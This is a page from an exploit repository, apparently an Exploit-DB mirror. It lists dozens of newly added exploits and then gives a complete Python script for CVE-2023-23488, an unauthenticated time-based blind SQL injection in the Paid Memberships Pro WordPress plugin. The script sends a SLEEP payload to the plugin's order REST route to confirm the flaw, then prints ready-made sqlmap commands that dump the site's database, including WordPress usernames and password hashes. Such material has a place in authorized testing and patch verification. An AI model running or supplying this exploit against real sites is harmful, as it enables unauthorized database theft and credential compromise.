d4e68dbb7e
39 changes to exploits/shellcodes/ghdb ProLink PRS1841 PLDT Home fiber - Default Password Nacos 2.0.3 - Access Control vulnerability sudo 1.8.0 to 1.9.12p1 - Privilege Escalation sleuthkit 4.11.1 - Command Injection Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS) ManageEngin AMP 4.3.0 - File-path-traversal SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS) AmazCart CMS 3.4 - Cross-Site-Scripting (XSS) Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS) Art Gallery Management System Project v1.0 - SQL Injection (sqli) authenticated Art Gallery Management System Project v1.0 - SQL Injection (sqli) Unauthenticated ChiKoi v1.0 - SQL Injection ERPGo SaaS 3.9 - CSV Injection GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE) GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration) Metform Elementor Contact Form Builder v3.1.2 - Unauthenticated Stored Cross-Site Scripting (XSS) MyBB 1.8.32 - Remote Code Execution (RCE) (Authenticated) Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection pimCore v5.4.18-skeleton - Sensitive Cookie with Improper SameSite Attribute Prizm Content Connect v10.5.1030.8315 - XXE SLIMSV 9.5.2 - Cross-Site Scripting (XSS) WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS) Roxy WI v6.1.0.0 - Improper Authentication Control Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload Solaris 10 libXm - Buffer overflow Local privilege escalation Chromacam 4.0.3.0 - PsyFrameGrabberService Unquoted Service Path Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow HotKey Clipboard 2.1.0.6 - Privilege Escalation Unquoted Service Path Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path Windows 11 10.0.22000 - Backup service Privilege Escalation Windows/x86 - Create Administrator User / Dynamic PEB & EDT method null-free Shellcode (373 bytes)
55 lines
No EOL
2.8 KiB
Python
Executable file
55 lines
No EOL
2.8 KiB
Python
Executable file
#!/usr/bin/env python
|
|
# Exploit Title: Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection
|
|
# Exploit Author: r3nt0n
|
|
# CVE: CVE-2023-23488
|
|
# Date: 2023/01/24
|
|
# Vulnerability discovered by Joshua Martinelle
|
|
# Vendor Homepage: https://www.paidmembershipspro.com
|
|
# Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip
|
|
# Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9
|
|
# Version: < 2.9.8
|
|
# Tested on: Debian 11 - WordPress 6.1.1 - Paid Memberships Pro 2.9.7
|
|
#
|
|
# Running this script against a WordPress instance with Paid Membership Pro plugin
|
|
# tells you if the target is vulnerable.
|
|
# As the SQL injection technique required to exploit it is Time-based blind, instead of
|
|
# trying to directly exploit the vuln, it will generate the appropriate sqlmap command
|
|
# to dump the whole database (probably very time-consuming) or specific chose data like
|
|
# usernames and passwords.
|
|
#
|
|
# Usage example: python3 CVE-2023-23488.py http://127.0.0.1/wordpress
|
|
|
|
import sys
|
|
import requests
|
|
|
|
def get_request(target_url, delay="1"):
|
|
payload = "a' OR (SELECT 1 FROM (SELECT(SLEEP(" + delay + ")))a)-- -"
|
|
data = {'rest_route': '/pmpro/v1/order',
|
|
'code': payload}
|
|
return requests.get(target_url, params=data).elapsed.total_seconds()
|
|
|
|
print('Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n')
|
|
if len(sys.argv) != 2:
|
|
print('Usage: {} <target_url>'.format("python3 CVE-2023-23488.py"))
|
|
print('Example: {} http://127.0.0.1/wordpress'.format("python3 CVE-2023-23488.py"))
|
|
sys.exit(1)
|
|
|
|
target_url = sys.argv[1]
|
|
try:
|
|
print('[-] Testing if the target is vulnerable...')
|
|
req = requests.get(target_url, timeout=15)
|
|
except:
|
|
print('{}[!] ERROR: Target is unreachable{}'.format(u'\033[91m',u'\033[0m'))
|
|
sys.exit(2)
|
|
|
|
if get_request(target_url, "1") >= get_request(target_url, "2"):
|
|
print('{}[!] The target does not seem vulnerable{}'.format(u'\033[91m',u'\033[0m'))
|
|
sys.exit(3)
|
|
print('\n{}[*] The target is vulnerable{}'.format(u'\033[92m', u'\033[0m'))
|
|
print('\n[+] You can dump the whole WordPress database with:')
|
|
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump'.format(target_url))
|
|
print('\n[+] To dump data from specific tables:')
|
|
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users'.format(target_url))
|
|
print('\n[+] To dump only WordPress usernames and passwords columns (you should check if users table have the default name):')
|
|
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users -C user_login,user_pass'.format(target_url))
|
|
sys.exit(0) |